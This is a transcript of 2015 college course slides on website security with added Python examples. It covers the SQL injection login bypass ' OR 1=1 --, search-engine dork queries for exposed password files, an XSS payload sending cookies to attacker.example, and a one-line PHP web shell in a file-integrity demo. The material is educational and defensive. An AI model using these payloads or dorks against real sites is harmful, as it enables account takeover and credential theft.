Transcript of Unit 28 Website Production (wiki.computing.hct.ac.uk/_media/computing/btec/level3/..., 2015-02-25)
Unit 28
Website Production
Website security
Problems and resolutions
25 February 2015
What are the threats?
June 18th 2014, The Sunday Times & The Sun websites
Problems
Identify the security issues on advanced websites
Online payments
Intercepting data – theft of information in transit
Changing data (tampering with it in transit or on the server)
Cracking or guessing usernames and passwords
Reading information from cookies
Use of an insecure or unpatched operating system
Weak authentication for access to the server
Undeleted files (old backups, test pages and uploads left on the server)
Weak encryption (weak ciphers or short keys)
Solutions
Firewalls
Encryption and Secure Sockets Layer (SSL), today its successor TLS
Monitoring applications
Spam prevention
File naming (do not give sensitive files guessable names or leave them inside the web root)
Use strong passwords
Website certificates: validate the organisation's identity to the visitor
SQL injection
Inserting SQL commands into the username and password textboxes of a login form
Login form: Username, Password
www.cmswire.com/cms/web-cms/how-they-hack-your-website-overview-of-common-techniques-002339.php
The login code builds its query by pasting the textbox contents straight into the SQL string:
SELECT * FROM users WHERE username = 'USRTEXT' AND password = 'PASSTEXT'
(USRTEXT and PASSTEXT stand for whatever was typed into the two boxes)
SQL injection
Inserting SQL commands into the username and password textboxes
Username: ' OR 1=1 --
Password: anything
' closes the username string, so what follows is read as SQL rather than as text
-- signifies a comment: everything after it, including the password check, is ignored
The query the server actually runs becomes:
SELECT * FROM users WHERE username = '' OR 1=1 -- ' AND password = 'anything'
which is effectively SELECT * FROM users WHERE username = '' OR 1=1
1=1 is always true, so every row matches and the attacker is logged in without knowing a password
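As an added example (not from the slides), the two ways of writing the login query in Python against an in-memory SQLite database with a constructed users table: the first splices the textbox contents into the SQL string exactly as the slide describes, the second passes them as query parameters so the database never interprets them as SQL. The usernames and passwords are made up for the demo.

```python
import sqlite3

# Constructed in-memory users table standing in for the site's real database.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "Tr0ub4dor&3"), ("alice", "correct horse")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The pattern on the slide: raw textbox contents spliced into the SQL string.

    With username = "' OR 1=1 --" the query becomes
    SELECT username FROM users WHERE username = '' OR 1=1 --' AND password = '...'
    and the -- comments out the password check.
    """
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(query)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterised query: the driver sends the text as data, never as SQL,
    so the quote and the comment marker are just characters in a username."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


# The payload typed into the Username box on the slide.
PAYLOAD = "' OR 1=1 --"


def demo() -> dict:
    """Run a genuine login, the injection against the vulnerable code,
    and the same injection against the parameterised code."""
    conn = make_db()
    return {
        "legit": login_safe(conn, "alice", "correct horse"),
        "vuln_bypass": login_vulnerable(conn, PAYLOAD, "anything"),
        "safe_blocked": login_safe(conn, PAYLOAD, "anything"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The vulnerable call returns every user (the attacker is "logged in" as the first one, admin), while the parameterised call returns nothing because it looks for a user literally named `' OR 1=1 --`.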
Google hacks (search queries that find exposed files)
Get password text files
Some websites leave password lists in plain-text files inside the web root, and search engines index them
inurl:passwd.txt
inurl:passlist.txt
"login: *" "password= *" filetype:xls
Cross-Site Scripting (XSS) attacks
Some websites store the username and password (or a session token) in cookies
Script injected through XSS reads the cookie (document.cookie) and sends the username and password to the attacker
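An added example, not from the slides, of the two defences this implies on the server side: user text is HTML-escaped before it is placed in the page so an injected script tag is displayed rather than executed, and the session cookie is set with HttpOnly so document.cookie cannot read it even if a script does run. The payload, the attacker hostname and the token are constructed for the demo.

```python
import html
from http.cookies import SimpleCookie

# Constructed attacker input: a classic cookie-stealing payload. The host
# attacker.example is a placeholder, not a real address.
XSS_PAYLOAD = (
    '<script>new Image().src="http://attacker.example/steal?c="'
    "+document.cookie</script>"
)


def render_vulnerable(comment: str) -> str:
    """Echoes user text straight into the page: the script tag survives and runs."""
    return '<p class="comment">' + comment + "</p>"


def render_safe(comment: str) -> str:
    """HTML-escapes the text, so the browser shows the payload instead of running it."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


def session_cookie_header(token: str) -> str:
    """Set-Cookie header for a session token.

    HttpOnly stops document.cookie (and so injected script) from reading it,
    Secure keeps it off plain HTTP, SameSite=Lax limits cross-site sending.
    """
    cookie = SimpleCookie()
    cookie["session"] = token
    morsel = cookie["session"]
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["samesite"] = "Lax"
    morsel["path"] = "/"
    return cookie.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(render_vulnerable(XSS_PAYLOAD))
    print(render_safe(XSS_PAYLOAD))
    print(session_cookie_header("c0ffee"))  # constructed token value
```

Escaping on output is the fix for the injection itself; HttpOnly is the damage-limiting flag that keeps a cookie-based login out of reach of any script that does get in.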
Protection mechanisms
Security is the most important consideration once the site exists
It must be built in at the development stage, not bolted on afterwards
Use an individual approach that takes into consideration the specific character of the particular web project
Protection
No method is 100% foolproof
The majority of attacks are automated, so block automated vulnerability scanning
After an incident, investigate forensically and recover
http://www.decision-web-design.com/security-hacking-articles/prevention
Protection
Code scanning – check the site's files for unauthorised changes
Known exploits and technique checking
.htaccess files
DNS blacklists
Hosting
File & directory permissions
Penetration testing
CAPTCHAs
DDoS – cloud hosting?
Separate files for sensitive data
Be careful with client-side scripting
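An added example (not from the slides) of the code-scanning item above: a small file-integrity check in Python that records a SHA-256 baseline of every file under the web root and reports anything added, removed or modified since. It is run here over a constructed temporary site with a simulated defacement and a dropped web shell; the file names and contents are made up.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large uploads do not sit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(webroot: Path) -> dict:
    """Map every file under webroot (path relative to it) to its SHA-256."""
    return {
        p.relative_to(webroot).as_posix(): hash_file(p)
        for p in sorted(webroot.rglob("*"))
        if p.is_file()
    }


def compare(baseline: dict, current: dict) -> dict:
    """Report files added, removed or modified since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(
            name for name in baseline
            if name in current and baseline[name] != current[name]
        ),
    }


def demo() -> dict:
    """Constructed scenario in a temporary directory: baseline a tiny site,
    then simulate a defaced index page and a dropped web shell, and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        webroot = Path(tmp) / "htdocs"
        (webroot / "js").mkdir(parents=True)
        (webroot / "index.php").write_text("<?php echo 'Welcome'; ?>\n")
        (webroot / "js" / "app.js").write_text("console.log('ok');\n")
        baseline = build_baseline(webroot)
        # In real use the baseline is stored where the web server cannot
        # write to it (off the box, or a read-only location), as JSON.
        saved = json.dumps(baseline)

        # Simulated attacker activity (constructed for the example):
        (webroot / "index.php").write_text("<?php echo 'Hacked'; ?>\n")
        (webroot / "js" / "shell.php").write_text("<?php system($_GET['c']); ?>\n")

        return compare(json.loads(saved), build_baseline(webroot))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run from cron against the live web root, a non-empty "added" or "modified" list is the alert; a new .php file in an uploads or js directory is the classic sign of a dropped shell.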
High security level for:
website content,
user accounts,
confidential information collected from users,
and protection of the admin controls from being taken over.
Requirements
Protection from:
spam,
automatic form submission,
use of a single account by multiple users, etc.
Also:
must not reduce website usability through repeated authorisation steps or slow malicious-code checks.
High level of convenience for users.
Methods
Encoding of the HTML code or its key parts (obfuscation; this hides the source from casual viewers but is not a security boundary).
Access-control passwords
must not be visible anywhere in the web code, i.e. they must be kept in a separate file outside the web root or in a database on the web server (and stored as salted hashes, never in plain text).
Security for site users
An unreliable security system can badly damage your business reputation.
Aim for complete protection of users' personal data.
Much of website protection depends on your hosting service.
TASK
Describe the general security risks which threaten the integrity of data.
Laws and guidelines
Data Protection Act (1998).
Copyright, Designs and Patents Act (1988)
Disability Discrimination Act (1995).
Data Protection Act (1998).
Protects personal information
Enforced by the Information Commissioner
8 principles, including:
Do not allow data to be passed outside the EU, other than to a country with laws equivalent to the EU's
Copyright, Designs and
Patents Act (1988)
Copyright – protection of intellectual property
©
Disability Discrimination Act (1995).
Must provide accessibility for your website
Task
Define the laws and guidelines which various types of website must conform to.